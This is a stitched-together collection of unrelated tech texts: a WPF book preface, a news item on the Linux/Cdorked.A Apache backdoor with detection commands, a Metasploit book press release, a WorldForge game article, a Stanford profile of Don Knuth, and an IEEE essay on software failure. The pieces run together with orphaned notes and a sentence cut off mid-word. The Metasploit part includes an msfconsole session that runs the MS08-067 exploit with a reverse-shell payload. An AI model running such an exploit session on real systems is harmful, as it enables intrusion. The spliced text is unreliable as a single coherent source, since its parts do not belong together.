This book covers most of WPF, not all of it. When I started writing the book, Chris Sells gave me an important piece of advice: "What you leave out is as important as what you include." Because WPF is an immense platform, to present the big picture I had to omit parts of it. This book represents what I believe are the best landmarks from which to explore the platform.
My goal with this book is to provide a map of the core concepts, how they relate to each other, and what motivated their design. I hope you'll come away from this book with a broad understanding of WPF and be able to explore the depth of the platform yourself.
Prerequisites
Before reading this book, you should be familiar with .NET. You don't need to be an expert, but you should be familiar with the basics of classes, methods, and events. The book uses only C# code in its examples. WPF is equally accessible in any .NET language; however, C# is what I use primarily for my development.
Organization
This book is organized into eight chapters and a three-part appendix. My goal was to tell the story of the WPF platform in as few chapters as possible.
Introduction (Chapter 1) briefly introduces the platform and explains how the seven major components of WPF fit together. This chapter also serves as a quick start for building applications with WPF, showing how to use the SDK tools and find content in the documentation.
Applications (Chapter 2) covers the structure of applications built using WPF, as well as the application services and top-level objects used by applications.
Controls (Chapter 3) covers both the major design patterns in WPF controls and the major control families in WPF. Controls are the fundamental building blocks of user interfaces in WPF; if you read only one chapter in the book, this is the one.
Layout (Chapter 4) covers the design of the layout system, and an overview of the six stock layout panels that ship in WPF.
Visuals (Chapter 5) provides an overview of the huge surface area that is the WPF visual system. The chapter covers typography, 2D and 3D graphics, animation, video, and audio.
Data (Chapter 6) covers the basics of data sources, data binding, resources, and data transfer operations.
Actions (Chapter 7) provides an overview of how events, commands, and triggers work to make things happen in your application.
Styles (Chapter 8) covers the styling system in WPF. Styling enables the clean separation of the designer and developer by allowing a loose coupling between the visual appearance of a UI and the programmatic structure.
The appendix, Base Services, drills down into some of the low-level services in WPF. Topics covered include threading model, the property and event system, input, composition, and printing.
Acknowledgments
This book has been a massive undertaking for me. I've worked on articles, presentations, and white papers before, but nothing prepared me for the sheer volume of work it takes to condense a platform the size of WPF into a relatively short book.
I've dedicated this book to my wife, Megan. She has been constantly supportive of this project (even when I brought a laptop on numerous vacations!) and everything else I do.
The entire Avalon team has been a huge help in the creation of this book (and the product!). My manager, Ian Ellison-Taylor, supported my working on this project. Sam Bent, Jeff Bogdan, Vivek Dalvi, Namita Gupta, Mike Hillberg, Robert Ingebretsen, David Jenni, Lauren Lavoie, Ashraf Michail, Kevin Moore, Greg Schechter—the team members who helped are too many to list. I thoroughly enjoyed working with everyone on the team.
I am grateful to Don Box for pushing me to write the book, and to Chris Sells for giving me sage advice even while we were creating competing books.
My developmental editor, Michael Weinhardt, deserves a huge amount of credit for the quality of this book. Michael read, reread, edited, and re-edited every section of this book. He pushed me to never accept anything that isn't great. All the errors and bad transitions in the book are purely my fault.
Joan Murray, Karen Gettman, Julie Nahil, and the entire staff at Addison-Wesley have done an amazing job dealing with me on this book. Stephanie Hiebert, my copy editor, spent countless hours poring over my poor spelling, grammar, and prose, turning my ramblings into the English language.
Finally, I want to thank the technical reviewers of this book. Erick Ellis, Joe Flanigan, Jessica Fosler, Christophe Nasarre, Nick Paldino, Chris Sells, and a host of others provided great feedback. Jessica gave me some of the deepest and most constructively critical feedback that I've ever received.
I'm sure I'm forgetting many other people, and for that I apologize.
Chris Anderson
November 2006
simplegeek.com
Note 1. This code name has no relationship to the Ruby programming language.
Compromised Apache binaries load malicious code
Researchers at web security firm Sucuri have discovered modified binaries in the open source Apache web server. The binaries will load malicious code or other web content without any user interaction. Only files that were installed using the cPanel administration tool are currently thought to be affected. ESET says that several hundred web servers have been compromised.
The attack has been named Linux/Cdorked.A and is difficult to detect: As cPanel doesn't install the web server through common package managers such as RPM, the verification mechanisms of the package managers won't be any help. The attackers also retain the file's timestamp to prevent it from being detected by its date in the directory listing. Sucuri says that searching for the open_tty character string provides a clear indication that a binary has been manipulated: grep -r open_tty /usr/local/apache/ doesn't return any results with Apache binaries that are intact.
Details on the functionality of the compromised Apache binaries have been released by the ESET researchers, who have described how the malware uses a shared memory segment that is about six megabytes in size and allows read and write access to all users and groups. The malware stores its configuration files in this memory segment. The server is controlled through specially crafted HTTP requests that won't show up in the server's log file and which allow the attackers to open a backdoor through which they can inject shell commands. The HTTP connection appears to hang while the shell is in use, which offers a further indication that an Apache server has been infected if an administrator looks for long-running HTTP connections. In addition to the backdoor, the attackers have also built in a mechanism that allows them to load content into other web pages behind the scenes. ESET says that, in certain conditions, this mechanism is used to redirect users to Blackhole exploits or pornographic pages. However, this is apparently only done once per day per IP address for each accessing browser.
An Apache server that has been infected with Linux/Cdorked.A can't easily be replaced because the file's immutable bit is set. chattr -ai /usr/local/apache/bin/httpd must be used to remove it before the server can be replaced with a web server that is intact.
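Taken together, the indicators described above lend themselves to a quick check. The following shell sketch assumes a cPanel-style Apache under /usr/local/apache; it is illustrative, not an official detection tool:

    #!/bin/sh
    # Illustrative checks for Linux/Cdorked.A on a cPanel-built Apache.
    HTTPD=/usr/local/apache/bin/httpd

    # 1. A clean build returns no results for the "open_tty" string.
    if grep -qr open_tty /usr/local/apache/; then
        echo "WARNING: open_tty found -- httpd may be compromised"
    fi

    # 2. The malware sets the immutable bit so the binary survives
    #    replacement; an 'i' flag in the lsattr output is another red flag.
    lsattr "$HTTPD"

    # 3. Only after clearing the immutable/append-only bits can the binary
    #    be replaced with a known-good build.
    chattr -ai "$HTTPD"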
"Darkleech", a predecessor< | 计算机 |
Metasploit--New from No Starch Press: New Book Promises to be the Definitive Guide to Using Metasploit for Penetration Testing
San Francisco, CA, July 7, 2011—The free and open source Metasploit Framework is the most popular suite of penetration testing tools in the world, with more than one million downloads yearly. But despite its popularity, Metasploit has—until now—lacked an authoritative user's guide.
Hailed by HD Moore, the founder of the Metasploit Project, as "the best guide to the Metasploit Framework available today," Metasploit: The Penetration Tester's Guide (No Starch Press, July 2011, 328 pp., $49.95, ISBN 9781593272883) teaches readers how to identify vulnerabilities in networks by using Metasploit to launch simulated attacks. The book's authors, acknowledged Metasploit gurus, begin by building a foundation for penetration testing and establishing a methodology. From there, they explain the Framework's conventions, interfaces, and module system, and then move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, devastating wireless attacks, and targeted social-engineering attacks.
"These days, everyone's a target," said No Starch Press founder Bill Pollock. "Consider Sony PlayStation, Lockheed Martin, the IMF, and Citigroup—all attacked in big ways, just this year. We're excited to release Metasploit: The Penetration Tester's Guide at this critical time because every business needs to make sure that its networks are secure. The Metasploit Framework is arguably the most powerful tool we have in our arsenal."
Metasploit: The Penetration Tester's Guide shows penetration testers how to:
Find exploits in unmaintained, misconfigured, and unpatched systems
Perform reconnaissance and find valuable information about a target
Bypass antivirus technologies and circumvent security controls
Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
Use the Meterpreter shell to launch attacks from inside a network
Harness stand-alone Metasploit utilities, third-party tools, and plug-ins
Learn how to write Meterpreter post exploitation modules and scripts
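To give a sense of the console-driven workflow the book walks through, here is a short, illustrative msfconsole session; the module, addresses, and payload are hypothetical choices for a lab network, not instructions from the book:

    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set RHOST 192.168.1.10
    RHOST => 192.168.1.10
    msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(ms08_067_netapi) > set LHOST 192.168.1.5
    LHOST => 192.168.1.5
    msf exploit(ms08_067_netapi) > exploit
    [*] Meterpreter session 1 opened
    meterpreter > sysinfo

Sessions like this one, followed by post-exploitation work in the Meterpreter shell, are the pattern the book's chapters build on.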
Whether readers' goals are to secure their own network or to put someone else's to the test, Metasploit: The Penetration Tester's Guide is without doubt the essential guide to using Metasploit.
WorldForge: In Pursuit of Open Source, Massive, Online Games
by Howard Wen
Ultima Online is what gamers call a massively multiplayer online role-playing game -- or MMORPG, for short. In this kind of environment, tens of thousands of players interact online. In some ways, it's like open source development, where a distributed collection of users (or developers) works together to make something happen.
One group of programmers is setting out to build a MMORPG using just such an open source model. WorldForge is an online community that formed three years ago to create such a game. The results of their early efforts were unveiled last year at LinuxTag 2001, with a working demo of their first online, role-playing game, Acorn.
Since that debut, the WorldForge community has gained a few hundred new contributors, but it's still a fairly small group. The game's announce list has 455 members, and on any given week, 10 to 20 folks commit code, content, or media. The group's focus now is on the development of a second game, Mason, and on working out the core principles around which clients and servers will communicate using the network protocol that WorldForge's programmers created, Atlas.
"The feel of the project has changed as people have come and gone, but all in all it feels as though we are really getting somewhere," says Al Riddoch, a 27-year-old from Southampton, U.K. Riddoch coordinates the development of Acorn and Mason when he's not working as a systems programmer for the University of Southampton. "Now we have more momentum than we have ever had before."
A task that's too big
The idea of an open source clone of Ultima Online hasn't evolved in the way it was originally envisioned. A few days after WorldForge was announced, one of the first decisions made by leaders of the effort was not to clone Ultima Online. They felt that the hack-and-slash play strategy of such games was boring and limited.
They also felt that from a technical standpoint, it was unrealistic to try to build a game that would serve tens of thousands of players simultaneously.
"We're a long way from cloning a commercial MMORPG, even if we wanted to," admits James Turner, a 21-year-old developer in Edinburgh, Scotland who works in Mac Mozilla development for an educational software company. He coordinates architectural development for WorldForge game servers and maintains a client-side session layer used by the project's various in-development clients.
So WorldForge focused on creating a generic game-engine client and server that would be flexible enough to support virtually any kind of online, role-playing game.
Obviously, a networking protocol is needed to run games like these. WorldForge programmers built such a "glue" to bind together large numbers of different clients and servers, along with editing tools for online games. Named Atlas, it's a technology that the community has been honing and aiming to have stand apart from the networking protocols used in commercial, online games.
Atlas is dynamically extensible and self-defining, so servers can communicate new types of entities and operations (actions) to the client. Clients can flexibly support various rule-sets and games without custom code, and new entities can be defined at will. This allows content creation to be much more iterative, and it enables a much looser client-server relationship than is traditionally possible. Present work on Atlas will also allow the protocol to be extended without the client or server needing to be restarted.
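To give a feel for what "self-defining" means in practice, here is an illustrative sketch (a Python rendering with invented attribute names, not the actual Atlas schema) of a server introducing a new entity type at run time:

    # Illustrative only -- not the real Atlas wire format. Because the
    # protocol is self-defining, the server can describe a brand-new
    # entity type and a client can handle it without custom code.
    new_entity_class = {
        "objtype": "class",
        "id": "pig",                  # new type, defined on the fly
        "parents": ["animal"],        # inherits behaviour from "animal"
        "attributes": {"mass": 30, "sellable": True},
    }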
"Atlas is probably way ahead of anything being used commercially in terms of flexibility and power," says Riddoch. "We are frequently told that Atlas is over-engineered and too slow, but I believe that in the long run, it will pay off. As CPUs get faster, the cost of this flexibility will diminish, and performance will be less of a problem."
Building on simple games
The first game developed by the WorldForge team, Acorn, was mainly an experiment for them to learn how to develop a very basic role-playing game. Players compete online to raise and sell pigs in a world rendered in 2D, isometric graphics. Compared to the vast scale of Ultima Online, the size of Acorn's environment is much smaller and it serves fewer players; its gameplay is simpler, too.
Screen shot of the role-play game, Acorn.
The work on Mason, the second WorldForge game under development, aims to develop ways to build and manipulate objects in a role-playing game, and to better understand the physics engine. Mason's world features two races, humans and orcs, who compete for resource materials that include trees, animals, and iron ore. There will be no combat or spell-casting; threats to player-characters will come in the form of inanimate objects like deadly traps and poison.
Stanford Report, June 1, 2011
Stanford's Don Knuth, a pioneering hero of computer programming
In 1962, a young graduate student set about writing the definitive book on computer programming. Five decades and four volumes later, Don Knuth is still writing and the Stanford School of Engineering has its latest "Engineering Hero."
By Andrew Myers
Photo: L.A. Cicero
Said Don Knuth: 'The very best computer programs rise to the level of art. They are beautiful.'
Some people are born before their time, and some after. Don Knuth was born precisely in his time. In the 1950s, Knuth was a student at Case Institute of Technology in Cleveland, Ohio, (now merged into Case Western Reserve University) and he answered the call for a job programming an IBM Type 650 computer, the first computer he had ever seen.
"Fortuity" hardly does the meeting justice. Knuth was born to program computers. It was as if computers, invented in the preceding decade, had been awaiting him.
Some 50 years later, thanks to his profound facility with algorithms, Knuth – pronounced "ka-NOOTH," as he notes with emphasis on his Web site – finds himself a reluctant celebrity and being toasted as one of eight in an inaugural class of Stanford Engineering Heroes that includes Bill Hewlett and Dave Packard, Vint Cerf, Ray Dolby, Dean Fred Terman, Charles Litton and William Durand.
"I'm not sure how I feel about this term hero," Knuth said with characteristic modesty. "I have heroes. I'm just a guy who has a way with computers. I'm not sure what I do rises to that level."
Yet, rise he does. Knuth is a giant in the field of computer science. His multi-volume, as-yet-unfinished magnum opus The Art of Computer Programming has sold more than a million copies. This, remember, is a tome on computer algorithms, not the latest self-help or diet book.
Heady company
To put Knuth's influence in perspective, American Scientist magazine in 1999 prepared a list of the best physical science books of the previous 100 years. There in the list of monographs, beside the likes of Einstein, Pauling, Dirac, Mandelbrot, Russell, von Neumann and Feynman, was Don Knuth. That is pretty heady company. It was an honor even the reticent Knuth had to acknowledge with a "Wow!"
Thus fame has come to Don Knuth. Acolytes recognize him on the street, pointing and whispering his name. They email him questions as if to an oracle, unaware perhaps that Knuth unburdened himself of email in 1990, before most even knew what email was, too busy to answer the near-constant flow. Silvered men, far closer to 70 than 17, corner him, albeit gently. They produce photos of fleeting encounters. They tell him: "You and I once met." Knuth kindly accedes to their designs on his time, chatting politely as if with an old friend.
The Art of Computer Programming has been a lifelong labor of love for Knuth. He began writing in 1962. The first volume was published in 1968. A second followed a year later, and a third in 1973. He was well into the fourth by 1977 and working on new editions of the first two, when he took a detour. A new programming challenge had occupied his mind.
The first three volumes of The Art of Computer Programming had been typeset in lead, a practice honed over the centuries since Gutenberg. The second edition, however, was typeset using a photo-optical process with substandard fonts and poor spacing. To this son of a typesetter, the results underwhelmed. The book was not beautiful.
Knuth set about fixing the problem. New machines, based on digital principles, were coming on the scene, although they still had not been harnessed to typeset mathematical formulas. His solutions – two programs known as TeX and METAFONT – would redefine the field of digital typography. Knuth planned for a year's detour; it took a decade. When he finished, he gave the works to the world, free to anyone who cared to use his programs.
He took up The Art of Computer Programming again in the late 1980s; he is now wrapping up volume four. If someone doesn't beat him to it, he hopes to complete three more.
Literate programming
And what of this remarkable facility with computers? "I guess my mind just works like a computer," he offered in an interview before the public event marking his Engineering Hero induction.
Knuth champions a programming philosophy known as "literate programming," encouraging – some say freeing – programmers to write programs by the flow of their thoughts, not according to the rules set down by the machine.
Literate programs can be read and understood by real people. They are written as ordinary human language, almost like an essay in which the traditional macros and source code are inserted within explanations of the author's logic and intentions. Such programming, according to Knuth, yields better programs by exposing poor logic and design decisions. The programs are their own documentation, flowing naturally out of the process of creation.
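A taste of the style, in the spirit of Knuth's own WEB tools (this fragment is illustrative, not taken from his books): the explanation leads, and the code falls out of it.

    @ We compute the greatest common divisor with Euclid's algorithm:
    replace the pair (u, v) by (v, u mod v) until v vanishes; what
    remains in u is the answer.

    @<Compute the gcd of |u| and |v|@>=
    while (v != 0) {
      t = u % v;  /* only the remainder matters on the next pass */
      u = v;
      v = t;
    }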
And that discussion leads back to his most famous work. When asked to explain the word "art" in the title of his book, the professor grew reflective. It could, after all, have been called simply Computer Programming. "In one way 'art' is like 'artificial,' meaning that it is not found in nature but made by human beings," he said. "There also are elements of fine art – of the ineffable – in there, too. The very best computer programs rise to the level of art. They are beautiful."
This insistence on the unquantifiable in his work has much to do with Knuth's love of music. His first dream was to be a musician. His royalties from The Art of Computer Programming have afforded him at least one luxury. He maintains a full-scale working pipe organ in his home and plays it regularly. In music, as with mathematics, he sees patterns and order and symmetry. "I'm convinced that Tchaikovsky would have loved combinatorial mathematics if he had lived a century later," he said.
A nod to Stanford Engineering
So, how did this devout Lutheran typesetter's son from Milwaukee, a graduate of Case and Caltech, end up at Stanford? Knuth gave a nod to the fact that Stanford, even then, was a world leader in computer science under George Forsythe, the man who, Knuth acknowledges, virtually invented the field.
At Stanford, the department was large enough that the young and driven Knuth was freed of academic politics to focus on his work. "I was just one of the boys here," he said. "I knew I wouldn't have to fight to keep the department going as with smaller departments at other schools. This is where the best people were and where I could do what I did best."
And then, of course, there were the students. "The kids were just so darn smart here," he said. "Many people think that good faculty means good students, but it's really the other way around."
Asked if, in his long career, there was anything about the computer age that had surprised him, Knuth responded flatly, "Everything."
And what if computers had not become what they have to our society and our culture? Where else might his career have led? Knuth paused to turn over the possibilities in his head. After a moment, he said, "I figure I would have been a computer scientist anyway. For me it has always been about solving interesting and challenging questions. I would still have studied algorithms even if fate had turned out differently than it did and if there wasn't a penny in programming."
Flowing from the lips of a man who spent a lifetime on a quest to write a solitary work, the same man who embraced a decade-long detour to redefine digital typesetting only to give the work away, it comes as no surprise.
Hero indeed.
Andrew Myers is associate director of communications for the School of Engineering.
Don Knuth's website
Website for The Art of Computer Programming
Stanford 'Engineering Heroes' website
Watch Knuth's 'All Questions Answered' Engineering Hero lecture
Why Software Fails
We waste billions of dollars each year on entirely preventable mistakes
By Robert N. Charette
Posted 2 Sep 2005 | 3:18 GMT
Photo: Graham Barclay/Bloomberg News/Landov
Market Crash: After its new automated supply-chain management system failed last October, leaving merchandise stuck in company warehouses, British food retailer Sainsbury's had to hire 3000 additional clerks to stock its shelves.
Have you heard the one about the disappearing warehouse? One day, it vanished--not from physical view, but from the watchful eyes of a well-known retailer's automated distribution system. A software glitch had somehow erased the warehouse's existence, so that goods destined for the warehouse were rerouted elsewhere, while goods at the warehouse languished. Because the company was in financial trouble and had been shuttering other warehouses to save money, the employees at the "missing" warehouse kept quiet. For three years, nothing arrived or left. Employees were still getting their paychecks, however, because a different computer system handled the payroll. When the software glitch finally came to light, the merchandise in the warehouse was sold off, and upper management told employees to say nothing about the episode.
This story has been floating around the information technology industry for 20-some years. It's probably apocryphal, but for those of us in the business, it's entirely plausible. Why? Because episodes like this happen all the time. Last October, for instance, the giant British food retailer J Sainsbury PLC had to write off its US $526 million investment in an automated supply-chain management system. It seems that merchandise was stuck in the company's depots and warehouses and was not getting through to many of its stores. Sainsbury was forced to hire about 3000 additional clerks to stock its shelves manually [see photo above, "Market Crash"].
[Table: "Software Hall of Shame", a catalog of notable project failures. Sources: Business Week, CEO Magazine, Computerworld, InfoWeek, Fortune, The New York Times, Time, and The Wall Street Journal. Dollar figures converted to U.S. dollars using exchange rates for the years cited.]
This is only one of the latest in a long, dismal history of IT projects gone awry [see table above, "Software Hall of Shame" for other notable fiascoes]. Most IT experts agree that such failures occur far more often than they should. What's more, the failures are universally unprejudiced: they happen in every country; to large companies and small; in commercial, nonprofit, and governmental organizations; and without regard to status or reputation. The business and societal costs of these failures--in terms of wasted taxpayer and shareholder dollars as well as investments that can't be made--are now well into the billions of dollars a year.
The problem only gets worse as IT grows ubiquitous. This year, organizations and governments will spend an estimated $1 trillion on IT hardware, software, and services worldwide. Of the IT projects that are initiated, from 5 to 15 percent will be abandoned before or shortly after delivery as hopelessly inadequate. Many others will arrive late and over budget or require massive reworking. Few IT projects, in other words, truly succeed.
The biggest tragedy is that software failure is for the most part predictable and avoidable. Unfortunately, most organizations don't see preventing failure as an urgent matter, even though that view risks harming the organization and maybe even destroying it. Understanding why this attitude persists is not just an academic exercise; it has tremendous implications for business and society.
SOFTWARE IS EVERYWHERE. It's what lets us get cash from an ATM, make a phone call, and drive our cars. A typical cellphone now contains 2 million lines of software code; by 2010 it will likely have 10 times as many. General Motors Corp. estimates that by then its cars will each have 100 million lines of code.
The average company spends about 4 to 5 percent of revenue on information technology, with those that are highly IT dependent--such as financial and telecommunications companies--spending more than 10 percent on it. In other words, IT is now one of the largest corporate expenses outside employee costs. Much of that money goes into hardware and software upgrades, software license fees, and so forth, but a big chunk is for new software projects meant to create a better future for the organization and its customers.
Governments, too, are big consumers of software. In 2003, the United Kingdom had more than 100 major government IT projects under way that totaled $20.3 billion. In 2004, the U.S. government cataloged 1200 civilian IT projects costing more than $60 billion, plus another $16 billion for military software.
Any one of these projects can cost over $1 billion. To take two current examples, the computer modernization effort at the U.S. Department of Veterans Affairs is projected to run $3.5 billion, while automating the health records of the UK's National Health Service is likely to cost more than $14.3 billion for development and another $50.8 billion for deployment.
Such megasoftware projects, once rare, are now much more common, as smaller IT operations are joined into "systems of systems." Air traffic control is a prime example, because it relies on connections among dozens of networks that provide communications, weather, navigation, and other data. But the trick of integration has stymied many an IT developer, to the point where academic researchers increasingly believe that computer science itself may need to be rethought in light of these massively complex systems.
When a project fails, it jeopardizes an organization's prospects. If the failure is large enough, it can steal the company's entire future. In one stellar meltdown, a poorly implemented resource planning system led FoxMeyer Drug Co., a $5 billion wholesale drug distribution company in Carrollton, Texas, to plummet into bankruptcy in 1996.
IT failure in government can imperil national security, as the FBI's Virtual Case File debacle has shown. The $170 million VCF system, a searchable database intended to allow agents to "connect the dots" and follow up on disparate pieces of intelligence, instead ended five months ago without any system's being deployed [see "Who Killed the Virtual Case File?" in this issue].
IT failures can also stunt economic growth and quality of life. Back in 1981, the U.S. Federal Aviation Administration began looking into upgrading its antiquated air-traffic-control system, but the effort to build a replacement soon became riddled with problems [see photo, "Air Jam," at top of this article]. By 1994, when the agency finally gave up on the project, the predicted cost had tripled, more than $2.6 billion had been spent, and the expected delivery date had slipped by several years. Every airplane passenger who is delayed because of gridlocked skyways still feels this cancellation; the cumulative economic impact of all those delays on just the U.S. airlines (never mind the passengers) approaches $50 billion.
Worldwide, it's hard to say how many software projects fail or how much money is wasted as a result. If you define failure as the total abandonment of a project before or shortly after it is delivered, and if you accept a conservative failure rate of 5 percent, then billions of dollars are wasted each year on bad software.
For example, in 2004, the U.S. government spent $60 billion on software (not counting the embedded software in weapons systems); a 5 percent failure rate means $3 billion was probably wasted. However, after several decades as an IT consultant, I am convinced that the failure rate is 15 to 20 percent for projects that have budgets of $10 million or more. Looking at the total investment in new software projects--both government and corporate--over the last five years, I estimate that project failures have likely cost the U.S. economy at least $25 billion and maybe as much as $75 billion.
Of course, that $75 billion doesn't reflect projects that exceed their budgets--which most projects do. Nor does it reflect projects delivered late--which the majority are. It also fails to account for the opportunity costs of having to start over once a project is abandoned or the costs of bug-ridden systems that have to be repeatedly reworked.
Then, too, there's the cost of litigation from irate customers suing suppliers for poorly implemented systems. When you add up all these extra costs, the yearly tab for failed and troubled software conservatively runs somewhere from $60 billion to $70 billion in the United States alone. For that money, you could launch the space shuttle 100 times, build and deploy the entire 24-satellite Global Positioning System, and develop the Boeing 777 from scratch--and still have a few billion left over.
Why do projects fail so often?
Among the most common factors:
Unrealistic or unarticulated project goals
Inaccurate estimates of needed resources
Badly defined system requirements
Poor reporting of the project's status
Unmanaged risks
Poor communication among customers, developers, and users
Use of immature technology
Inability to handle the project's complexity
Sloppy development practices
Poor project management
Stakeholder politics
Commercial pressures
Of course, IT projects rarely fail for just one or two reasons. The FBI's VCF project suffered from many of the problems listed above. Most failures, in fact, can be traced to a combination of technical, project management, and business decisions. Each dimension interacts with the others in complicated ways that exacerbate project risks and problems and increase the likelihood of failure.
Consider a simple software chore: a purchasing system that automates the ordering, billing, and shipping of parts, so that a salesperson can input a customer's order, have it automatically checked against pricing and contract requirements, and arrange to have the parts and invoice sent to the customer from the warehouse.
The requirements for the system specify four basic steps. First, there's the sales process, which creates a bill of sale. That bill is then sent through a legal process, which reviews the contractual terms and conditions of the potential sale and approves them. Third in line is the provision process, which sends out the parts contracted for, followed by the finance process, which sends out an invoice.
Let's say that as the first process, for sales, is being written, the programmers treat every order as if it were placed in the company's main location, even though the company has branches in several states and countries. That mistake, in turn, affects how tax is calculated, what kind of contract is issued, and so on.
The sooner the omission is detected and corrected, the better. It's kind of like knitting a sweater. If you spot a missed stitch right after you make it, you can simply unravel a bit of yarn and move on. But if you don't catch the mistake until the end, you may need to unravel the whole sweater just to redo that one stitch.
If the software coders don't catch their omission until final system testing--or worse, until after the system has been rolled out--the costs incurred to correct the error will likely be many times greater than if they'd caught the mistake while they were still working on the initial sales process.
And unlike a missed stitch in a sweater, this problem is much harder to pinpoint; the programmers will see only that errors are appearing, and these might have several causes. Even after the original error is corrected, they'll need to change other calculations and documentation and then retest every step.
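To make the example concrete, here is a toy sketch, invented code rather than anything from a real system, of how the assumption gets baked in:

    # The sales process quietly assumes every order is placed at
    # headquarters, so tax -- and everything the bill feeds downstream,
    # contracts, shipping, invoicing -- inherits the error.
    HEADQUARTERS = {"state": "TX", "tax_rate": 0.0825}

    def create_bill_of_sale(customer, items):
        subtotal = sum(item["price"] * item["qty"] for item in items)
        # BUG: should use the branch that actually took the order,
        # e.g. customer["branch"]["tax_rate"], not headquarters'.
        tax = subtotal * HEADQUARTERS["tax_rate"]
        return {"customer": customer["name"],
                "subtotal": subtotal,
                "tax": tax,
                "total": subtotal + tax}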
In fact, studies have shown that software specialists spend about 40 to 50 percent of their time on avoidable rework rather than on what they call value-added work, which is basically work that's done right the first time. Once a piece of software makes it into the field, the cost of fixing an error can be 100 times as high as it would have been during the development stage.
If errors abound, then rework can start to swamp a project, like a dinghy in a storm. What's worse, attempts to fix an error often introduce new ones. It's like you're bailing out that dinghy, but you're also creating leaks. If too many errors are produced, the cost and time needed to complete the system become so great that going on doesn't make sense.
In the simplest terms, an IT project usually fails when the rework exceeds the value-added work that's been budgeted for. This is what happened to Sydney Water Corp., the largest water provider in Australia, when it attempted to introduce an automated customer information and billing system in 2002 [see box, "Case Study #2"]. According to an investigation by the Australian Auditor General, among the factors that doomed the project were inadequate planning and specifications, which in turn led to numerous change requests and significant added costs and delays. Sydney Water aborted the project midway, after spending AU $61 million (US $33.2 million).
All of which leads us to the obvious question: why do so many errors occur?
Software project failures have a lot in common with airplane crashes. Just as pilots never intend to crash, software developers don't aim to fail. When a commercial plane crashes, investigators look at many factors, such as the weather, maintenance records, the pilot's disposition and training, and cultural factors within the airline. Similarly, we need to look at the business environment, technical management, project management, and organizational culture to get to the roots of software failures.
Chief among the business factors are competition and the need to cut costs. Increasingly, senior managers expect IT departments to do more with less and do it faster than before; they view software projects not as investments but as pure costs that must be controlled.
Political exigencies can also wreak havoc on an IT project's schedule, cost, and quality. When Denver International Airport attempted to roll out its automated baggage-handling system, state and local political leaders held the project to one unrealistic schedule after another. The failure to deliver the system on time delayed the 1995 opening of the airport (then the largest in the United States), which compounded the financial impact manyfold.
Even after the system was completed, it never worked reliably: it chewed up baggage, and the carts used to shuttle luggage around frequently derailed. Eventually, United Airlines, the airport's main tenant, sued the system contractor, and the episode became a testament to the dangers of political expediency.
A lack of upper-management support can also damn an IT undertaking. This runs the gamut from failing to allocate enough money and manpower to not clearly establishing the IT project's relationship to the organization's business. In 2000, retailer Kmart Corp., in Troy, Mich., launched a $1.4 billion IT modernization effort aimed at linking its sales, marketing, supply, and logistics systems, to better compete with rival Wal-Mart Corp., in Bentonville, Ark. Wal-Mart proved too formidable, though, and 18 months later, cash-strapped Kmart cut back on modernization, writing off the $130 million it had already invested in IT. Four months later, it declared bankruptcy; the company continues to struggle today.
Frequently, IT project managers eager to get funded resort to a form of liar's poker, overpromising what their project will do, how much it will cost, and when it will be completed. Many, if not most, software projects start off with budgets that are too small. When that happens, the developers have to make up for the shortfall somehow, typically by trying to increase productivity, reducing the scope of the effort, or taking risky shortcuts in the review and testing phases. These all increase the likelihood of error and, ultimately, failure.
A state-of-the-art travel reservation system spearheaded by a consortium of Budget Rent-A-Car, Hilton Hotels, Marriott, and AMR, the parent of American Airlines, is a case in point. In 1992, three and a half years and $165 million into the project, the group abandoned it, citing two main reasons: an overly optimistic development schedule and an underestimation of the technical difficulties involved. This was the same group that had earlier built the hugely successful Sabre reservation system, proving that past performance is no guarantee of future results.
After crash investigators consider the weather as a factor in a plane crash, they look at the airplane itself. Was there something in the plane's design that caused the crash? Was it carrying too much weight?
In IT project failures, similar questions invariably come up regarding the project's technical components: the hardware and software used to develop the system and the development practices themselves. Organizations are often seduced by the siren song of the technological imperative--the uncontrollable urge to use the latest technology in hopes of gaining a competitive edge. With technology changing fast and promising fantastic new capabilities, it is easy to succumb. But using immature or untested technology is a sure route to failure.
In 1997, after spending $40 million, the state of Washington shut down an IT project that would have processed driver's licenses and vehicle registrations. Motor vehicle officials admitted that they got caught up in chasing technology instead of concentrating on implementing a system that met their requirements. The IT debacle that brought down FoxMeyer Drug a year earlier also stemmed from adopting a state-of-the-art resource-planning system and then pushing it beyond what it could feasibly do.
A project's sheer size is a fountainhead of failure. Studies indicate that large-scale projects fail three to five times more often than small ones. The larger the project, the more complexity there is in both its static elements (the discrete pieces of software, hardware, and so on) and its dynamic elements (the couplings and interactions among hardware, software, and users; connections to other systems; and so on). Greater complexity increases the possibility of errors, because no one really understands all the interacting parts of the whole or has the ability to test them.
Sobering but true: it's impossible to thoroughly test an IT system of any real size. Roger S. Pressman pointed out in his book Software Engineering, one of the classic texts in the field, that "exhaustive testing presents certain logistical problems....Even a small 100-line program with some nested paths and a single loop executing less than twenty times may require 10 to the power of 14 possible paths to be executed." To test all of those 100 trillion paths, he noted, assuming each could be evaluated in a millisecond, would take 3170 years.
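The arithmetic is easy to verify with a quick back-of-the-envelope computation:

    paths = 10**14                     # possible execution paths
    seconds = paths / 1000             # one millisecond per path
    years = seconds / (3600 * 24 * 365)
    print(round(years))                # -> 3171, i.e. Pressman's "3170 years"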
All IT systems are intrinsically fragile. In a large brick building, you'd have to remove hundreds of strategically placed bricks to make a wall collapse. But in a 100 000-line software program, it takes only one or two bad lines to produce major problems. In 1991, a portion of AT&T's telephone network went out, leaving 12 million subscribers without service, all because of a single mistyped character in one line of code.
Sloppy development practices are a rich source of failure, and they can cause errors at any stage of an IT project. To help organizations assess their software-development practices, the U.S. Software Engineering Institute, in Pittsburgh, created the Capability Maturity Model, or CMM. It rates a company's practices against five levels of increasing maturity. Level 1 means the organization is using ad hoc and possibly chaotic development practices. Level 3 means the company has characterized its practices and now understands them. Level 5 means the organization quantitatively understands the variations in the processes and practices it applies.
As of January, nearly 2000 government and commercial organizations had voluntarily reported CMM levels. Over half acknowledged being at either level 1 or 2, 30 percent were at level 3, and only 17 percent had reached level 4 or 5. The percentages are even more dismal when you realize that this is a self-selected group; obviously, companies with the worst IT practices won't subject themselves to a CMM evaluation. (The CMM is being superseded by the CMM-Integration, which aims for a broader assessment of an organization's ability to create software-intensive systems.)
